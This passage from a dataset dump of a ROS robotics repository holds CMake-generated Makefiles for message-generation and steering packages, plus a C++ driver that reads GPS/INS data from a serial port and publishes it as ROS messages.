-f zfmsg/CMakeFiles/zfmsg_gencpp.dir/build.make zfmsg/CMakeFiles/zfmsg_gencpp.dir/build\n.PHONY : zfmsg_gencpp/fast\n\n#=============================================================================\n# Target rules for targets named _zfmsg_generate_messages_check_deps_CanInfo\n\n# Build rule for target.\n_zfmsg_generate_messages_check_deps_CanInfo: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 _zfmsg_generate_messages_check_deps_CanInfo\n.PHONY : _zfmsg_generate_messages_check_deps_CanInfo\n\n# fast build rule for target.\n_zfmsg_generate_messages_check_deps_CanInfo/fast:\n\t$(MAKE) -f zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfo.dir/build.make zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfo.dir/build\n.PHONY : _zfmsg_generate_messages_check_deps_CanInfo/fast\n\n#=============================================================================\n# Target rules for targets named _zfmsg_generate_messages_check_deps_CanInfoAW\n\n# Build rule for target.\n_zfmsg_generate_messages_check_deps_CanInfoAW: cmake_check_build_system\n\t$(MAKE) -f 
CMakeFiles/Makefile2 _zfmsg_generate_messages_check_deps_CanInfoAW\n.PHONY : _zfmsg_generate_messages_check_deps_CanInfoAW\n\n# fast build rule for target.\n_zfmsg_generate_messages_check_deps_CanInfoAW/fast:\n\t$(MAKE) -f zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfoAW.dir/build.make zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_CanInfoAW.dir/build\n.PHONY : _zfmsg_generate_messages_check_deps_CanInfoAW/fast\n\n#=============================================================================\n# Target rules for targets named zfmsg_generate_messages_py\n\n# Build rule for target.\nzfmsg_generate_messages_py: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 zfmsg_generate_messages_py\n.PHONY : zfmsg_generate_messages_py\n\n# fast build rule for target.\nzfmsg_generate_messages_py/fast:\n\t$(MAKE) -f zfmsg/CMakeFiles/zfmsg_generate_messages_py.dir/build.make zfmsg/CMakeFiles/zfmsg_generate_messages_py.dir/build\n.PHONY : zfmsg_generate_messages_py/fast\n\n#=============================================================================\n# Target rules for targets named _zfmsg_generate_messages_check_deps_ThrottleGearStatus\n\n# Build rule for target.\n_zfmsg_generate_messages_check_deps_ThrottleGearStatus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 _zfmsg_generate_messages_check_deps_ThrottleGearStatus\n.PHONY : _zfmsg_generate_messages_check_deps_ThrottleGearStatus\n\n# fast build rule for target.\n_zfmsg_generate_messages_check_deps_ThrottleGearStatus/fast:\n\t$(MAKE) -f zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_ThrottleGearStatus.dir/build.make zfmsg/CMakeFiles/_zfmsg_generate_messages_check_deps_ThrottleGearStatus.dir/build\n.PHONY : _zfmsg_generate_messages_check_deps_ThrottleGearStatus/fast\n\n#=============================================================================\n# Target rules for targets named zfmsg_geneus\n\n# Build rule for target.\nzfmsg_geneus: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 zfmsg_geneus\n.PHONY : zfmsg_geneus\n\n# fast build rule for target.\nzfmsg_geneus/fast:\n\t$(MAKE) -f zfmsg/CMakeFiles/zfmsg_geneus.dir/build.make zfmsg/CMakeFiles/zfmsg_geneus.dir/build\n.PHONY : zfmsg_geneus/fast\n\n#=============================================================================\n# Target rules for targets named zfmsg_genlisp\n\n# Build rule for target.\nzfmsg_genlisp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 zfmsg_genlisp\n.PHONY : zfmsg_genlisp\n\n# fast build rule for target.\nzfmsg_genlisp/fast:\n\t$(MAKE) -f zfmsg/CMakeFiles/zfmsg_genlisp.dir/build.make zfmsg/CMakeFiles/zfmsg_genlisp.dir/build\n.PHONY : zfmsg_genlisp/fast\n\n#=============================================================================\n# Target rules for targets named zfmsg_generate_messages_lisp\n\n# Build rule for target.\nzfmsg_generate_messages_lisp: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 zfmsg_generate_messages_lisp\n.PHONY : zfmsg_generate_messages_lisp\n\n# fast build rule for target.\nzfmsg_generate_messages_lisp/fast:\n\t$(MAKE) -f zfmsg/CMakeFiles/zfmsg_generate_messages_lisp.dir/build.make zfmsg/CMakeFiles/zfmsg_generate_messages_lisp.dir/build\n.PHONY : zfmsg_generate_messages_lisp/fast\n\n#=============================================================================\n# Target rules for targets named zfmsg_generate_messages_nodejs\n\n# Build rule for target.\nzfmsg_generate_messages_nodejs: cmake_check_build_system\n\t$(MAKE) -f CMakeFiles/Makefile2 
zfmsg_generate_messages_nodejs\n.PHONY : zfmsg_generate_messages_nodejs\n\n# fast build rule for target.\nzfmsg_generate_messages_nodejs/fast:\n\t$(MAKE) -f zfmsg/CMakeFiles/zfmsg_generate_messages_nodejs.dir/build.make zfmsg/CMakeFiles/zfmsg_generate_messages_nodejs.dir/build\n.PHONY : zfmsg_generate_messages_nodejs/fast\n\n# Help Target\nhelp:\n\t@echo \"The following are some of the valid targets for this Makefile:\"\n\t@echo \"... all (the default if no target is provided)\"\n\t@echo \"... clean\"\n\t@echo \"... depend\"\n\t@echo \"... install\"\n\t@echo \"... clean_test_results\"\n\t@echo \"... run_tests\"\n\t@echo \"... download_extra_data\"\n\t@echo \"... tests\"\n\t@echo \"... edit_cache\"\n\t@echo \"... doxygen\"\n\t@echo \"... rebuild_cache\"\n\t@echo \"... list_install_components\"\n\t@echo \"... install/strip\"\n\t@echo \"... install/local\"\n\t@echo \"... test\"\n\t@echo \"... gmock\"\n\t@echo \"... gmock_main\"\n\t@echo \"... gtest\"\n\t@echo \"... gtest_main\"\n\t@echo \"... zf_msgs_genpy\"\n\t@echo \"... zf_msgs_gencpp\"\n\t@echo \"... geometry_msgs_generate_messages_eus\"\n\t@echo \"... zf_msgs_generate_messages_py\"\n\t@echo \"... std_msgs_generate_messages_py\"\n\t@echo \"... geometry_msgs_generate_messages_nodejs\"\n\t@echo \"... zf_msgs_generate_messages\"\n\t@echo \"... std_msgs_generate_messages_nodejs\"\n\t@echo \"... std_msgs_generate_messages_cpp\"\n\t@echo \"... _zf_msgs_generate_messages_check_deps_pose2dArray\"\n\t@echo \"... std_msgs_generate_messages_eus\"\n\t@echo \"... zf_msgs_genlisp\"\n\t@echo \"... geometry_msgs_generate_messages_lisp\"\n\t@echo \"... std_msgs_generate_messages_lisp\"\n\t@echo \"... geometry_msgs_generate_messages_py\"\n\t@echo \"... _zf_msgs_generate_messages_check_deps_pos320\"\n\t@echo \"... zf_msgs_generate_messages_lisp\"\n\t@echo \"... zf_msgs_generate_messages_cpp\"\n\t@echo \"... zf_msgs_generate_messages_eus\"\n\t@echo \"... zf_msgs_geneus\"\n\t@echo \"... geometry_msgs_generate_messages_cpp\"\n\t@echo \"... zf_msgs_generate_messages_nodejs\"\n\t@echo \"... _catkin_empty_exported_target\"\n\t@echo \"... zf_msgs_gennodejs\"\n\t@echo \"... gps_planner\"\n\t@echo \"... path_genpy\"\n\t@echo \"... path_generate_messages_nodejs\"\n\t@echo \"... path_genlisp\"\n\t@echo \"... path_generate_messages_lisp\"\n\t@echo \"... path_generate_messages_eus\"\n\t@echo \"... path_gencpp\"\n\t@echo \"... rosgraph_msgs_generate_messages_cpp\"\n\t@echo \"... path_generate_messages_cpp\"\n\t@echo \"... path_gennodejs\"\n\t@echo \"... roscpp_generate_messages_py\"\n\t@echo \"... rosgraph_msgs_generate_messages_eus\"\n\t@echo \"... actionlib_msgs_generate_messages_eus\"\n\t@echo \"... path_generate_messages_py\"\n\t@echo \"... roscpp_generate_messages_eus\"\n\t@echo \"... rosgraph_msgs_generate_messages_py\"\n\t@echo \"... rosgraph_msgs_generate_messages_lisp\"\n\t@echo \"... roscpp_generate_messages_nodejs\"\n\t@echo \"... roscpp_generate_messages_lisp\"\n\t@echo \"... path_geneus\"\n\t@echo \"... rosgraph_msgs_generate_messages_nodejs\"\n\t@echo \"... nav_msgs_generate_messages_cpp\"\n\t@echo \"... actionlib_msgs_generate_messages_cpp\"\n\t@echo \"... nav_msgs_generate_messages_eus\"\n\t@echo \"... nav_msgs_generate_messages_lisp\"\n\t@echo \"... path_generate_messages\"\n\t@echo \"... nav_msgs_generate_messages_nodejs\"\n\t@echo \"... roscpp_generate_messages_cpp\"\n\t@echo \"... actionlib_msgs_generate_messages_py\"\n\t@echo \"... nav_msgs_generate_messages_py\"\n\t@echo \"... actionlib_msgs_generate_messages_lisp\"\n\t@echo \"... 
actionlib_msgs_generate_messages_nodejs\"\n\t@echo \"... driver\"\n\t@echo \"... pos320_genpy\"\n\t@echo \"... pos320_generate_messages_py\"\n\t@echo \"... pos320_generate_messages\"\n\t@echo \"... pos320_geneus\"\n\t@echo \"... simulator\"\n\t@echo \"... pos320_generate_messages_eus\"\n\t@echo \"... pos320_generate_messages_cpp\"\n\t@echo \"... pos320_generate_messages_lisp\"\n\t@echo \"... pos320_gencpp\"\n\t@echo \"... pos320_genlisp\"\n\t@echo \"... pos320_generate_messages_nodejs\"\n\t@echo \"... pos320_gennodejs\"\n\t@echo \"... pure_pursuit\"\n\t@echo \"... steer_genpy\"\n\t@echo \"... steer_gencpp\"\n\t@echo \"... steer_generate_messages_cpp\"\n\t@echo \"... steer_generate_messages\"\n\t@echo \"... steer_geneus\"\n\t@echo \"... steer_generate_messages_lisp\"\n\t@echo \"... steer_genlisp\"\n\t@echo \"... steer_generate_messages_nodejs\"\n\t@echo \"... steer_generate_messages_eus\"\n\t@echo \"... steer_gennodejs\"\n\t@echo \"... steer_generate_messages_py\"\n\t@echo \"... zfmsg_gennodejs\"\n\t@echo \"... zfmsg_genpy\"\n\t@echo \"... zfmsg_generate_messages_cpp\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_MotionCmd\"\n\t@echo \"... zfmsg_generate_messages\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_BreakStatus\"\n\t@echo \"... zfmsg_generate_messages_eus\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_SteerStatus\"\n\t@echo \"... zfmsg_gencpp\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_CanInfo\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_CanInfoAW\"\n\t@echo \"... zfmsg_generate_messages_py\"\n\t@echo \"... _zfmsg_generate_messages_check_deps_ThrottleGearStatus\"\n\t@echo \"... zfmsg_geneus\"\n\t@echo \"... zfmsg_genlisp\"\n\t@echo \"... zfmsg_generate_messages_lisp\"\n\t@echo \"... zfmsg_generate_messages_nodejs\"\n.PHONY : help\n\n\n\n#=============================================================================\n# Special targets to cleanup operation of make.\n\n# Special rule to run CMake to check the build system integrity.\n# No rule that depends on this can have commands that come from listfiles\n# because they might be regenerated.\ncmake_check_build_system:\n\t$(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 0\n.PHONY : cmake_check_build_system\n\n"
},
{
"alpha_fraction": 0.5793522000312805,
"alphanum_fraction": 0.6309716701507568,
"avg_line_length": 31.287582397460938,
"blob_id": "3001556ca7c3a808cfa5865783eef58a3f4c26eb",
"content_id": "95b63e168c1d0e1b70eccf54665d682fe621a605",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 4940,
"license_type": "no_license",
"max_line_length": 119,
"num_lines": 153,
"path": "/src/pos320/src/driver.cpp",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "#include \"ros/ros.h\"\n#include \"std_msgs/String.h\"\n\n#include \"zf_msgs/pos320.h\"\n\n#include <iostream>\n#include <sstream>\n\n#include <deque>\n#include <boost/bind.hpp>\n#include <boost/asio.hpp>\n#include <boost/asio/serial_port.hpp>\n#include <boost/thread.hpp>\n#include <boost/endian/arithmetic.hpp>\n#include <boost/asio.hpp>\n#include <boost/asio/serial_port.hpp>\n#include <boost/optional.hpp>\n\n\nusing namespace boost::endian;\n///using namespace Eigen;\n\nstruct Pos320Struct {\n little_uint8_t length;\n little_uint8_t mode;\n little_int16_t time1;\n little_int32_t time2;\n little_uint8_t num;\n};\n\n\nint main(int argc, char **argv)\n{\n std::cout.precision(11);\n std::cout.precision(9);\n ros::init(argc, argv, \"driver\");\n\n ros::NodeHandle n;\n\n ros::Publisher pos320_pub = n.advertise<zf_msgs::pos320>(\"pos320_pose\", 1000);\n\n /// relative to frequency of pos320\n ros::Rate loop_rate(30);\n\n /// defination of serial port for pos320\n /// set options for pos320_sp\n boost::asio::io_service io;\n boost::asio::serial_port pos320_sp(io,\"/dev/ttyUSB0\");\n\n pos320_sp.set_option(boost::asio::serial_port_base::baud_rate(115200));\n pos320_sp.set_option(boost::asio::serial_port_base::character_size(8));\n pos320_sp.set_option(boost::asio::serial_port_base::stop_bits(boost::asio::serial_port_base::stop_bits::one));\n pos320_sp.set_option(boost::asio::serial_port_base::parity(boost::asio::serial_port_base::parity::none));\n pos320_sp.set_option(boost::asio::serial_port_base::flow_control(boost::asio::serial_port_base::flow_control::none));\n boost::system::error_code ec;\n pos320_sp.open(\"/dev/ttyUSB0\", ec );\n if( !pos320_sp.is_open()){\n std::cout<< \"port not opened\" << std::endl;\n }\n std::cout<< \"port opened\" << std::endl;\n\n zf_msgs::pos320 pos320_data;\n\n bool is_initialized = false;\n\n int count = 0;\n while (ros::ok())\n {\n /// read pos32 data from serial port\n unsigned char c = 0;\n boost::asio::read(pos320_sp, boost::asio::buffer(&c, 1));\n if (0xaa != c && !is_initialized) {\n /// initializing\n if(c != 83){\n std::cout<<\"Initializing, \" << (int)c/ 2 <<\"\\% completed ......\" << std::endl;\n }\n if(c == 200){is_initialized = true;}\n continue;\n }\n boost::asio::read(pos320_sp, boost::asio::buffer(&c, 1));\n if (0x55 != c) {\n continue;\n }\n Pos320Struct p;\n boost::asio::read(pos320_sp, boost::asio::buffer(&p, sizeof(p)));\n double lat;\n boost::asio::read(pos320_sp, boost::asio::buffer(&lat, sizeof(lat)));\n double lon;\n boost::asio::read(pos320_sp, boost::asio::buffer(&lon, sizeof(lon)));\n float height;\n boost::asio::read(pos320_sp, boost::asio::buffer(&height, sizeof(height)));\n float v_n;\n boost::asio::read(pos320_sp, boost::asio::buffer(&v_n, sizeof(v_n)));\n float v_e;\n boost::asio::read(pos320_sp, boost::asio::buffer(&v_e, sizeof(v_e)));\n float v_earth;\n boost::asio::read(pos320_sp, boost::asio::buffer(&v_earth, sizeof(v_earth)));\n float roll;\n boost::asio::read(pos320_sp, boost::asio::buffer(&roll, sizeof(roll)));\n float pitch ;\n boost::asio::read(pos320_sp, boost::asio::buffer(&pitch, sizeof(pitch)));\n float head ;\n boost::asio::read(pos320_sp, boost::asio::buffer(&head, sizeof(head)));\n short a_n ;\n boost::asio::read(pos320_sp, boost::asio::buffer(&a_n, sizeof(a_n)));\n short a_e ;\n boost::asio::read(pos320_sp, boost::asio::buffer(&a_e, sizeof(a_e)));\n short a_earth;\n boost::asio::read(pos320_sp, boost::asio::buffer(&a_earth, sizeof(a_earth)));\n short v_roll;\n boost::asio::read(pos320_sp, 
boost::asio::buffer(&v_roll, sizeof(v_roll)));\n        short v_pitch;\n        boost::asio::read(pos320_sp, boost::asio::buffer(&v_pitch, sizeof(v_pitch)));\n        short v_head;\n        boost::asio::read(pos320_sp, boost::asio::buffer(&v_head, sizeof(v_head)));\n        char status;\n        boost::asio::read(pos320_sp, boost::asio::buffer(&status, sizeof(status)));\n        int status1 = (status & 0xC0) >> 6;\n        int status2 = status & 0x3f;\n        boost::asio::read(pos320_sp, boost::asio::buffer(&c, 1));\n        pos320_data.checksum = c;\n\n        pos320_data.length = int(p.length);\n        pos320_data.mode = p.mode;\n        pos320_data.time1 = p.time1;\n        pos320_data.time2 = p.time2;\n        pos320_data.num = p.num;\n        pos320_data.lat = lat;\n        pos320_data.lon = lon;\n        pos320_data.height = height;\n        pos320_data.v_n = v_n;\n        pos320_data.v_e = v_e;\n        pos320_data.v_earth = v_earth;\n        pos320_data.roll = roll;\n        pos320_data.pitch = pitch / 100;\n        pos320_data.head = head;\n        pos320_data.a_n = a_n;\n        pos320_data.a_e = a_e;\n        pos320_data.a_earth = a_earth;\n        pos320_data.v_roll = v_roll;\n        pos320_data.v_pitch = v_pitch;\n        pos320_data.v_head = v_head;\n        pos320_data.status1 = status1;\n        pos320_data.status2 = status2;\n        pos320_pub.publish(pos320_data);\n        ros::spinOnce();\n        std::cout << lat << \"\\t\" << lon << \"\\n\";\n\n        loop_rate.sleep();\n    }\n\n    return 0;\n}\n"
},
{
"alpha_fraction": 0.7383536100387573,
"alphanum_fraction": 0.7500487565994263,
"avg_line_length": 36.0843391418457,
"blob_id": "a6abaf7edc7b2f0271953c9db3ed12759a7e09c8",
"content_id": "36fe5d850ad7f597d6c3e0e4ab2ad119ab8e66c0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 15391,
"license_type": "no_license",
"max_line_length": 222,
"num_lines": 415,
"path": "/build/steer/Makefile",
"repo_name": "chouer19/zhuifengShow0919",
"src_encoding": "UTF-8",
"text": "# CMAKE generated file: DO NOT EDIT!\n# Generated by \"Unix Makefiles\" Generator, CMake Version 3.5\n\n# Default target executed when no arguments are given to make.\ndefault_target: all\n\n.PHONY : default_target\n\n# Allow only one \"make -f Makefile2\" at a time, but pass parallelism.\n.NOTPARALLEL:\n\n\n#=============================================================================\n# Special targets provided by cmake.\n\n# Disable implicit rules so canonical targets will work.\n.SUFFIXES:\n\n\n# Remove some rules from gmake that .SUFFIXES does not remove.\nSUFFIXES =\n\n.SUFFIXES: .hpux_make_needs_suffix_list\n\n\n# Suppress display of executed commands.\n$(VERBOSE).SILENT:\n\n\n# A target that is always out of date.\ncmake_force:\n\n.PHONY : cmake_force\n\n#=============================================================================\n# Set environment variables for the build.\n\n# The shell in which to execute make rules.\nSHELL = /bin/sh\n\n# The CMake executable.\nCMAKE_COMMAND = /usr/bin/cmake\n\n# The command to remove a file.\nRM = /usr/bin/cmake -E remove -f\n\n# Escaping for special characters.\nEQUALS = =\n\n# The top-level source directory on which CMake was run.\nCMAKE_SOURCE_DIR = /home/zf/xuechong_ws/zhuifengShow0919/src\n\n# The top-level build directory on which CMake was run.\nCMAKE_BINARY_DIR = /home/zf/xuechong_ws/zhuifengShow0919/build\n\n#=============================================================================\n# Targets provided globally by CMake.\n\n# Special rule for the target install\ninstall: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install\n\n# Special rule for the target install\ninstall/fast: preinstall/fast\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Install the project...\"\n\t/usr/bin/cmake -P cmake_install.cmake\n.PHONY : install/fast\n\n# Special rule for the target test\ntest:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running tests...\"\n\t/usr/bin/ctest --force-new-ctest-process $(ARGS)\n.PHONY : test\n\n# Special rule for the target test\ntest/fast: test\n\n.PHONY : test/fast\n\n# Special rule for the target install/local\ninstall/local: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing only the local directory...\"\n\t/usr/bin/cmake -DCMAKE_INSTALL_LOCAL_ONLY=1 -P cmake_install.cmake\n.PHONY : install/local\n\n# Special rule for the target install/local\ninstall/local/fast: install/local\n\n.PHONY : install/local/fast\n\n# Special rule for the target edit_cache\nedit_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake cache editor...\"\n\t/usr/bin/ccmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : edit_cache\n\n# Special rule for the target edit_cache\nedit_cache/fast: edit_cache\n\n.PHONY : edit_cache/fast\n\n# Special rule for the target list_install_components\nlist_install_components:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Available install components are: \\\"Unspecified\\\"\"\n.PHONY : list_install_components\n\n# Special rule for the target list_install_components\nlist_install_components/fast: list_install_components\n\n.PHONY : list_install_components/fast\n\n# Special rule for the target install/strip\ninstall/strip: preinstall\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Installing the project stripped...\"\n\t/usr/bin/cmake 
-DCMAKE_INSTALL_DO_STRIP=1 -P cmake_install.cmake\n.PHONY : install/strip\n\n# Special rule for the target install/strip\ninstall/strip/fast: install/strip\n\n.PHONY : install/strip/fast\n\n# Special rule for the target rebuild_cache\nrebuild_cache:\n\t@$(CMAKE_COMMAND) -E cmake_echo_color --switch=$(COLOR) --cyan \"Running CMake to regenerate build system...\"\n\t/usr/bin/cmake -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR)\n.PHONY : rebuild_cache\n\n# Special rule for the target rebuild_cache\nrebuild_cache/fast: rebuild_cache\n\n.PHONY : rebuild_cache/fast\n\n# The main all target\nall: cmake_check_build_system\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -E cmake_progress_start /home/zf/xuechong_ws/zhuifengShow0919/build/CMakeFiles /home/zf/xuechong_ws/zhuifengShow0919/build/steer/CMakeFiles/progress.marks\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/all\n\t$(CMAKE_COMMAND) -E cmake_progress_start /home/zf/xuechong_ws/zhuifengShow0919/build/CMakeFiles 0\n.PHONY : all\n\n# The main clean target\nclean:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/clean\n.PHONY : clean\n\n# The main clean target\nclean/fast: clean\n\n.PHONY : clean/fast\n\n# Prepare targets for installation.\npreinstall: all\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/preinstall\n.PHONY : preinstall\n\n# Prepare targets for installation.\npreinstall/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/preinstall\n.PHONY : preinstall/fast\n\n# clear depends\ndepend:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(CMAKE_COMMAND) -H$(CMAKE_SOURCE_DIR) -B$(CMAKE_BINARY_DIR) --check-build-system CMakeFiles/Makefile.cmake 1\n.PHONY : depend\n\n# Convenience name for target.\nsteer/CMakeFiles/pure_pursuit.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/pure_pursuit.dir/rule\n.PHONY : steer/CMakeFiles/pure_pursuit.dir/rule\n\n# Convenience name for target.\npure_pursuit: steer/CMakeFiles/pure_pursuit.dir/rule\n\n.PHONY : pure_pursuit\n\n# fast build rule for target.\npure_pursuit/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/pure_pursuit.dir/build.make steer/CMakeFiles/pure_pursuit.dir/build\n.PHONY : pure_pursuit/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_genpy.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_genpy.dir/rule\n.PHONY : steer/CMakeFiles/steer_genpy.dir/rule\n\n# Convenience name for target.\nsteer_genpy: steer/CMakeFiles/steer_genpy.dir/rule\n\n.PHONY : steer_genpy\n\n# fast build rule for target.\nsteer_genpy/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/steer_genpy.dir/build.make steer/CMakeFiles/steer_genpy.dir/build\n.PHONY : steer_genpy/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_gencpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_gencpp.dir/rule\n.PHONY : steer/CMakeFiles/steer_gencpp.dir/rule\n\n# Convenience name for target.\nsteer_gencpp: steer/CMakeFiles/steer_gencpp.dir/rule\n\n.PHONY : steer_gencpp\n\n# fast build rule for target.\nsteer_gencpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/steer_gencpp.dir/build.make 
steer/CMakeFiles/steer_gencpp.dir/build\n.PHONY : steer_gencpp/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_generate_messages_cpp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_generate_messages_cpp.dir/rule\n.PHONY : steer/CMakeFiles/steer_generate_messages_cpp.dir/rule\n\n# Convenience name for target.\nsteer_generate_messages_cpp: steer/CMakeFiles/steer_generate_messages_cpp.dir/rule\n\n.PHONY : steer_generate_messages_cpp\n\n# fast build rule for target.\nsteer_generate_messages_cpp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/steer_generate_messages_cpp.dir/build.make steer/CMakeFiles/steer_generate_messages_cpp.dir/build\n.PHONY : steer_generate_messages_cpp/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_generate_messages.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_generate_messages.dir/rule\n.PHONY : steer/CMakeFiles/steer_generate_messages.dir/rule\n\n# Convenience name for target.\nsteer_generate_messages: steer/CMakeFiles/steer_generate_messages.dir/rule\n\n.PHONY : steer_generate_messages\n\n# fast build rule for target.\nsteer_generate_messages/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/steer_generate_messages.dir/build.make steer/CMakeFiles/steer_generate_messages.dir/build\n.PHONY : steer_generate_messages/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_geneus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_geneus.dir/rule\n.PHONY : steer/CMakeFiles/steer_geneus.dir/rule\n\n# Convenience name for target.\nsteer_geneus: steer/CMakeFiles/steer_geneus.dir/rule\n\n.PHONY : steer_geneus\n\n# fast build rule for target.\nsteer_geneus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/steer_geneus.dir/build.make steer/CMakeFiles/steer_geneus.dir/build\n.PHONY : steer_geneus/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_generate_messages_lisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_generate_messages_lisp.dir/rule\n.PHONY : steer/CMakeFiles/steer_generate_messages_lisp.dir/rule\n\n# Convenience name for target.\nsteer_generate_messages_lisp: steer/CMakeFiles/steer_generate_messages_lisp.dir/rule\n\n.PHONY : steer_generate_messages_lisp\n\n# fast build rule for target.\nsteer_generate_messages_lisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/steer_generate_messages_lisp.dir/build.make steer/CMakeFiles/steer_generate_messages_lisp.dir/build\n.PHONY : steer_generate_messages_lisp/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_genlisp.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_genlisp.dir/rule\n.PHONY : steer/CMakeFiles/steer_genlisp.dir/rule\n\n# Convenience name for target.\nsteer_genlisp: steer/CMakeFiles/steer_genlisp.dir/rule\n\n.PHONY : steer_genlisp\n\n# fast build rule for target.\nsteer_genlisp/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/steer_genlisp.dir/build.make steer/CMakeFiles/steer_genlisp.dir/build\n.PHONY : steer_genlisp/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_generate_messages_nodejs.dir/rule:\n\tcd 
/home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_generate_messages_nodejs.dir/rule\n.PHONY : steer/CMakeFiles/steer_generate_messages_nodejs.dir/rule\n\n# Convenience name for target.\nsteer_generate_messages_nodejs: steer/CMakeFiles/steer_generate_messages_nodejs.dir/rule\n\n.PHONY : steer_generate_messages_nodejs\n\n# fast build rule for target.\nsteer_generate_messages_nodejs/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f steer/CMakeFiles/steer_generate_messages_nodejs.dir/build.make steer/CMakeFiles/steer_generate_messages_nodejs.dir/build\n.PHONY : steer_generate_messages_nodejs/fast\n\n# Convenience name for target.\nsteer/CMakeFiles/steer_generate_messages_eus.dir/rule:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f CMakeFiles/Makefile2 steer/CMakeFiles/steer_generate_messages_eus.dir/rule\n.PHONY : steer/CMakeFiles/steer_generate_messages_eus.dir/rule\n\n# Convenience name for target.\nsteer_generate_messages_eus: steer/CMakeFiles/steer_generate_messages_eus.dir/rule\n\n.PHONY : steer_generate_messages_eus\n\n# fast build rule for target.\nsteer_generate_messages_eus/fast:\n\tcd /home/zf/xuechong_ws/zhuifengShow0919/build && $(MAKE) -f 